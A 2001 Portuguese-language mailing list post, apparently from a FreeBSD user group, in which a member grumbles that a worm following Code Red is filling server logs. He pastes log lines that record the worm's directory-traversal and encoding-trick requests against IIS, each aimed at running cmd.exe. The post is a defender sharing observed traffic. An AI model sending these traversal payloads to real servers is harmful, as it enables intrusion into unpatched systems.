[FUGSPBR] Que ótimo.

[Ricardo Ryoiti Sugawara Junior]

    Olá.

    Vejam que ótimo. Depois do codered enchendo nossos logs, me parece 
que temos outro worm, que dessa vez pesquisa diversas vulnerabilidades 
do IIS... Não estou preocupado com as falhas, mas acredito que todos 
ficamos de saco cheio de ver esse tipo de coisa nos nossos logs .. :/


200.193.137.242 - - [18/Sep/2001:20:38:01 -0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 322 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 322 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 338 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (-pct)
200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 
(0pct)
200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 (0pct)

    []'s
    Ricardo.

----
Para sair da lista envie um e-mail para majordomo em fugspbr.org
com as palavras "unsubscribe fugspbr" no corpo da mensagem.